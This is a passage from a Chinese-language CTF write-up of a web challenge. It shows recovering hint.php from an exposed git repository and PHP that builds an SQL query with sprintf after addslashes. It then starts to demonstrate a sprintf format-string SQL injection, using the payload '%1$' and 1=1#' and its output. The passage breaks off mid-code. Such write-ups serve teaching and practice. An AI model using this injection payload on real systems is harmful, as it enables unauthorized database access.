文章目录
WEB
萌新赛
给她:php sprintf格式化字符串漏洞
给她谐音为git,使用githack恢复出一个hint.php
<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>
由此可见是利用php的sprintf格式化字符串漏洞完成注入
先看以下sprintf漏洞的实例
<?php
$input=addslashes("%1$' and 1=1#");
print_r($input); // %1$\' and 1=1#
$b=sprintf("AND b='%s'",$input);
print_r($b); // AND b='%1$\' and 1=1#'
$sql=sprintf("SELECT * FROM t WHERE a='%s' $b ",